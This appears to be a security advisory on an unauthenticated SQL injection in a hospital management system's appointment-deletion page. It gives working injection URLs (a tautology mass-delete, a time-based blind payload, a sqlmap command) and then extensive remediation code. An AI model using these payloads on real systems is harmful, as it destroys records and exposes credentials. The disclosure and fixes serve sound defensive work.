# Vulnerability Summary: Online Hospital Management System SQL Injection Vulnerability

## Vulnerability Overview

An unrestricted SQL injection vulnerability exists in the `viewappointment.php` file of the **Online Hospital Management System**. The vulnerability arises because the `delid` parameter is concatenated directly into a `DELETE` SQL query without any filtering, escaping, or parameterized-query protection.

* **Trigger Condition**: Can be triggered by any **unauthenticated** remote attacker.
* **Exploitation Method**: Attackers do not need a login session; they only need to pass a maliciously crafted `delid` parameter via the URL.
* **Consequences**: Attackers can exploit this vulnerability to delete all appointment records, bypass authentication, or extract sensitive database information (including administrator credentials).

## Impact Scope

Successful exploitation of this vulnerability allows attackers to:

* Delete all appointment records without authentication.
* Extract sensitive data from the database using blind SQL injection techniques.
* Obtain administrator credentials by dumping the `tbl_login` table.
* Compromise the entire application by gaining administrator privileges.

## Remediation

1. **Use Prepared Statements**: Avoid direct string concatenation by using parameterized queries.
2. **Add Authentication and Authorization Checks**: Verify user identity before performing any sensitive operation.
3. **Validate Resource Ownership**: Ensure users can only delete records they own.
4. **Change HTTP Method**: Sensitive state-changing operations should use POST requests instead of GET.

## POC Code and Exploitation Code

### 1. Basic Deletion Proof (Direct Parameter)

Access the following URL to delete the appointment with ID 1:

```text
http://[target]/Hospital/viewappointment.php?delid=1
```

### 2. Bulk Deletion via SQL Injection

Access the following URL to delete all records in the `appointment` table:

```text
http://[target]/Hospital/viewappointment.php?delid=1' OR '1'='1
```

The resulting SQL statement is:

```sql
DELETE FROM appointment WHERE appointmentid='1' OR '1'='1'
```

### 3. Time-Based Blind SQL Injection

Use the following payload to verify the vulnerability via time delay:

```text
http://[target]/Hospital/viewappointment.php?delid=1' AND (SELECT SLEEP(5)) AND '1'='1
```

### 4. Automated Exploitation Using sqlmap

```bash
sqlmap -u "http://[target]/Hospital/viewappointment.php?delid=1" --level 3
```

### Remediation Code Examples

**1. Using Prepared Statements:**

```php
if(isset($_GET['delid'])) {
    // The "?" placeholder keeps user input out of the SQL text; "i" binds it as an integer
    $stmt = $con->prepare("DELETE FROM appointment WHERE appointmentid = ?");
    $stmt->bind_param("i", $_GET['delid']);
    $stmt->execute();
}
```

**2. Adding Authentication and Authorization Checks:**

```php
session_start(); // the session must be started before $_SESSION can be read
if(!isset($_SESSION['patientid']) && !isset($_SESSION['adminid'])) {
    header('Location: login.php');
    exit;
}
```

**3. Validating Resource Ownership:**

```php
$stmt = $con->prepare("SELECT patientid FROM appointment WHERE appointmentid = ?");
$stmt->bind_param("i", $_GET['delid']);
$stmt->execute();
$result = $stmt->get_result()->fetch_assoc();
// fetch_assoc() returns null when no row matches; treat a missing record as unauthorized too
if(!$result || ($result['patientid'] != $_SESSION['patientid'] && !isset($_SESSION['adminid']))) {
    die("Unauthorized");
}
```
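The three snippets above are shown separately; the following is an added example (written for this summary, not code from the Online Hospital Management System) that combines all four remediation items into one delete handler: a login check, a POST-only path with a CSRF token, integer validation of `delid`, and a parameterized ownership check and delete inside a single transaction. It assumes `$con` is a `mysqli` connection, the `patientid` / `adminid` session keys and the `appointment(appointmentid, patientid)` table named in this summary, and a session key `csrf_token` and a function name `deleteAppointment` that are this example's own choices.

```php
<?php
// Hardened replacement for the delete path of viewappointment.php (illustrative example).
// Assumptions: $con is a mysqli connection; sessions use 'patientid' / 'adminid' as in the
// advisory; the CSRF token lives in $_SESSION['csrf_token'] (name chosen for this example).
declare(strict_types=1);

session_start();
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on SQL errors instead of failing silently

/**
 * Deletes one appointment on behalf of the logged-in user.
 * Returns a short status string so the caller can decide what to render.
 */
function deleteAppointment(mysqli $con, array $session, array $post): string
{
    // 1. Authentication: a patient or an admin must be logged in (remediation item 2).
    $isAdmin   = isset($session['adminid']);
    $patientId = $session['patientid'] ?? null;
    if (!$isAdmin && $patientId === null) {
        return 'unauthenticated';
    }

    // 2. CSRF: a POST form must carry the token issued with it (goes with item 4).
    if (!isset($post['csrf_token'], $session['csrf_token'])
        || !hash_equals($session['csrf_token'], (string) $post['csrf_token'])) {
        return 'bad-csrf';
    }

    // 3. Input validation: delid must be a positive integer, never a free-form string.
    $delid = filter_var($post['delid'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($delid === false) {
        return 'invalid-id';
    }

    // 4. Ownership check and delete, both parameterized (items 1 and 3), in one transaction
    //    so the row cannot change hands between the check and the delete.
    $con->begin_transaction();
    try {
        $stmt = $con->prepare('SELECT patientid FROM appointment WHERE appointmentid = ? FOR UPDATE');
        $stmt->bind_param('i', $delid);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();

        if ($row === null) {
            $con->rollback();
            return 'not-found';
        }
        if (!$isAdmin && (int) $row['patientid'] !== (int) $patientId) {
            $con->rollback();
            return 'forbidden';
        }

        $stmt = $con->prepare('DELETE FROM appointment WHERE appointmentid = ?');
        $stmt->bind_param('i', $delid);
        $stmt->execute();
        $con->commit();
        return 'deleted';
    } catch (mysqli_sql_exception $e) {
        $con->rollback();
        error_log('appointment delete failed: ' . $e->getMessage()); // log server-side, never echo SQL errors
        return 'error';
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Only POST may change state (remediation item 4); a GET link can no longer delete anything.
    $status = deleteAppointment($con, $_SESSION, $_POST);
    if ($status === 'unauthenticated') {
        header('Location: login.php');
        exit;
    }
    echo htmlspecialchars($status, ENT_QUOTES, 'UTF-8');
} else {
    // GET renders the confirmation form and issues the CSRF token the POST must return.
    $_SESSION['csrf_token'] ??= bin2hex(random_bytes(32));
    $token = htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES, 'UTF-8');
    echo '<form method="post">'
       . '<input type="hidden" name="csrf_token" value="' . $token . '">'
       . '<input type="number" name="delid" min="1" required>'
       . '<button type="submit">Delete appointment</button>'
       . '</form>';
}
```

Because `delid` is bound as an integer through a placeholder, the `' OR '1'='1` and `SLEEP(5)` payloads shown above are rejected by `filter_var` before any query runs, and even a value that passed validation would reach MySQL only as a bound parameter, not as SQL text. The `FOR UPDATE` lock on the ownership query is what makes the check-then-delete sequence safe against a concurrent reassignment of the row.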